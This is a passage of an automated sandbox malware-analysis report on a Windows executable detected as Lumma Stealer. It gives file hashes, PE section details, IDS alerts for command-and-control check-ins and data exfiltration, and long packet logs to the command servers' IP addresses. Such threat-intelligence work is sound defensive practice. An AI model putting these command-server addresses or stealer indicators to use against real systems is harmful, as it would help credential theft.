	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Quasar, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Quasar, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

Process:	C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2792448
Entropy (8bit):	6.516095117476879
Encrypted:	false
SSDEEP:	49152:cWpWo4+9aCzUgFDIPG2naeD0/3gjOChrbsJflHH3P:cWfh9aCzZFDIP5naeD0fIVNbGl/
MD5:	D730CAAD65AD7FD200196A21832C5371
SHA1:	5AEDB2BCEE5B4A3701D195BBB6D789A7BBDC70D7
SHA-256:	FCFA77809B53DB2CCC71499455A7EEA5218B32910FACC1CFA0B8F25C468B1BBA
SHA-512:	3C3F5523FE154BB617564C5E2FAA13B4B0294F7BBDA5636E5F1C3F87AC98B6202A979F12BEEB6A43519618C7DFC23B5B6737B207E46E055C31FA9D4B2265DD5B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. .......................@+.....8.+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...lzzfrkam.@......<..:..............@...epgvtoot. ..........v.............@....taggant.@....+.."...z*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.508235005330775
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'955'264 bytes
MD5:	6f748a450e7266ed42ec5c20759179b0
SHA1:	011fbd74c785121cfa2e00ba600815860af3a027
SHA256:	6938753b23ae29142838c0c10ffa02f9235b8915eecb4c6dbbaf9eb33bd464f5
SHA512:	03ae587db3462a640ea27dc03a75df85e448e93e07e807b9686761374cf8109140d71dfd6af3fd4a5d82f58959f89cb975f0091e84a5d32e828e77522ed8936b
SSDEEP:	24576:IBpSPu+SMGnAitmg2Mzy8x6yHyRi6Jy5wpTbCLNUjNzQ9KpV+fvRonZPn/2xRbMO:IBpSPueGxzy8xORi6JykTm04nRMxZHA
TLSH:	C1D55C92B50971CBC09E17B8AA37CF41AA6D03B9471448DBEC6CB6BA7D63CC315B5C24
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........00...........@..........................`0.....7g-...@.................................T...h..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x703000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FFA706FB70Ah
psadbw mm5, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FFA706FD705h
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5a054	0x68	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5a1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x58000	0x27e00	c17e659452978a117dbff9c552aba29b	False	0.9979060540752351	data	7.972133901620748	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x59000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5a000	0x1000	0x200	555a11fa24a077379003c187d9c9d020	False	0.14453125	data	0.9996515881509258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gcjkebaw	0x5b000	0x2a7000	0x2a6200	ef1ff1c7dec9a8f844c733801992b2c1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
forwcvfp	0x302000	0x1000	0x400	54d59cca963585894055e7055c2942a2	False	0.7724609375	data	6.086276581156126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x303000	0x3000	0x2200	4cc62586ac1f05fcbd635d240f417101	False	0.06824448529411764	DOS executable (COM)	0.7924646664007395	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-29T06:59:09.856714+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49710	188.114.96.3	443	TCP
2024-10-29T06:59:09.856714+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49710	188.114.96.3	443	TCP
2024-10-29T06:59:11.040669+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49711	188.114.96.3	443	TCP
2024-10-29T06:59:11.040669+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49711	188.114.96.3	443	TCP
2024-10-29T06:59:18.042738+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49737	188.114.96.3	443	TCP
2024-10-29T06:59:23.007121+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49763	188.114.96.3	443	TCP
2024-10-29T06:59:23.935727+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.6	49769	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 06:59:08.630481958 CET	49710	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:08.630512953 CET	443	49710	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:08.630731106 CET	49710	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:08.642277002 CET	49710	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:08.642290115 CET	443	49710	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:09.250066042 CET	443	49710	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:09.250298023 CET	49710	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:09.290854931 CET	49710	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:09.290874958 CET	443	49710	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:09.291277885 CET	443	49710	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:09.343841076 CET	49710	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:09.349910975 CET	49710	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:09.384000063 CET	49710	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:09.384010077 CET	443	49710	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:09.856719017 CET	443	49710	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:09.856817007 CET	443	49710	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:09.856872082 CET	49710	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:09.858491898 CET	49710	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:09.858510017 CET	443	49710	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:09.858524084 CET	49710	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:09.858530998 CET	443	49710	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:09.937458038 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:09.937510967 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:09.937663078 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:09.938134909 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:09.938150883 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:10.546147108 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:10.546230078 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:10.547913074 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:10.547928095 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:10.548134089 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:10.550050020 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:10.550149918 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:10.550182104 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.040697098 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.040764093 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.040792942 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.040837049 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.040874958 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.040906906 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.040998936 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.041014910 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.041014910 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.041029930 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.043481112 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.043490887 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.094300032 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.157258987 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.157322884 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.157421112 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.157438040 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.157757044 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.157898903 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.157908916 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.158157110 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.163451910 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.163451910 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.163574934 CET	49711	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.163593054 CET	443	49711	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.357203007 CET	49713	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.357228041 CET	443	49713	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.357368946 CET	49713	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.357719898 CET	49713	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:11.357733011 CET	443	49713	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.999497890 CET	443	49713	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:11.999587059 CET	49713	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:12.020270109 CET	49713	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:12.020283937 CET	443	49713	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:12.021063089 CET	443	49713	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:12.022638083 CET	49713	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:12.022780895 CET	49713	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:12.022866964 CET	443	49713	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:12.591669083 CET	443	49713	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:12.591922045 CET	49713	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:12.591938019 CET	443	49713	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:12.592010021 CET	49713	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:12.747145891 CET	49714	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:12.747179031 CET	443	49714	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:12.747271061 CET	49714	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:12.747669935 CET	49714	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:12.747694969 CET	443	49714	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:13.369637966 CET	443	49714	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:13.369740009 CET	49714	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:13.371141911 CET	49714	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:13.371150970 CET	443	49714	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:13.371479034 CET	443	49714	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:13.372783899 CET	49714	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:13.372863054 CET	49714	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:13.372900009 CET	443	49714	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:13.372966051 CET	49714	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:13.372972965 CET	443	49714	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:13.932167053 CET	443	49714	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:13.932378054 CET	443	49714	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:13.932573080 CET	49714	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:13.932760954 CET	49714	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:13.932784081 CET	443	49714	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:14.159290075 CET	49725	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:14.159317970 CET	443	49725	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:14.161443949 CET	49725	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:14.161741018 CET	49725	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:14.161756039 CET	443	49725	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:14.769659042 CET	443	49725	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:14.769758940 CET	49725	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:14.791567087 CET	49725	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:14.791585922 CET	443	49725	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:14.792473078 CET	443	49725	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:14.795450926 CET	49725	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:14.795573950 CET	49725	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:14.795619011 CET	443	49725	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:14.795701027 CET	49725	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:14.795717955 CET	443	49725	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:15.600579977 CET	443	49725	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:15.600810051 CET	443	49725	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:15.600837946 CET	49725	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:15.600860119 CET	49725	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:16.002424002 CET	49737	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:16.002459049 CET	443	49737	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:16.002527952 CET	49737	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:16.002924919 CET	49737	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:16.002939939 CET	443	49737	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:16.610918045 CET	443	49737	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:16.611041069 CET	49737	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:16.612668991 CET	49737	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:16.612684011 CET	443	49737	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:16.613012075 CET	443	49737	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:16.614927053 CET	49737	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:16.615026951 CET	49737	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:16.615036011 CET	443	49737	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:18.042848110 CET	443	49737	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:18.043101072 CET	49737	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:18.588380098 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:18.588398933 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:18.588464975 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:18.588987112 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:18.588998079 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.206362963 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.206453085 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.207999945 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.208009005 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.208340883 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.209651947 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.210417986 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.210453033 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.210717916 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.210755110 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.211258888 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.211308956 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.211458921 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.211481094 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.211637974 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.211661100 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.211857080 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.211888075 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.211899042 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.211910009 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.212047100 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.212074995 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.212096930 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.212238073 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.212268114 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.222366095 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.222615004 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.222661972 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.222680092 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.222692013 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.222718954 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:19.222785950 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:19.222824097 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:21.805856943 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:21.806087971 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:21.806153059 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:21.808280945 CET	49747	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:21.808296919 CET	443	49747	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:21.869267941 CET	49763	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:21.869292974 CET	443	49763	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:21.869398117 CET	49763	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:21.869765043 CET	49763	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:21.869776964 CET	443	49763	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:22.495069027 CET	443	49763	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:22.495147943 CET	49763	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:22.496378899 CET	49763	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:22.496391058 CET	443	49763	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:22.497148037 CET	443	49763	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:22.498480082 CET	49763	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:22.498507977 CET	49763	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:22.498564005 CET	443	49763	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:23.007194042 CET	443	49763	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:23.007473946 CET	443	49763	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:23.007558107 CET	49763	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:23.007679939 CET	49763	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:23.007690907 CET	443	49763	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:23.007713079 CET	49763	443	192.168.2.6	188.114.96.3
Oct 29, 2024 06:59:23.007719040 CET	443	49763	188.114.96.3	192.168.2.6
Oct 29, 2024 06:59:23.009536982 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:23.014883995 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.014955997 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:23.015075922 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:23.020396948 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.935600042 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.935617924 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.935638905 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.935713053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.935726881 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:23.935728073 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.935744047 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.935760021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.935780048 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:23.935794115 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:23.935913086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.935930014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.935944080 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.935967922 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:23.935992002 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:23.941088915 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:23.984532118 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.092092991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.092111111 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.092125893 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.092147112 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.092155933 CET	49769	80	192.168.2.6	185.215.113.16
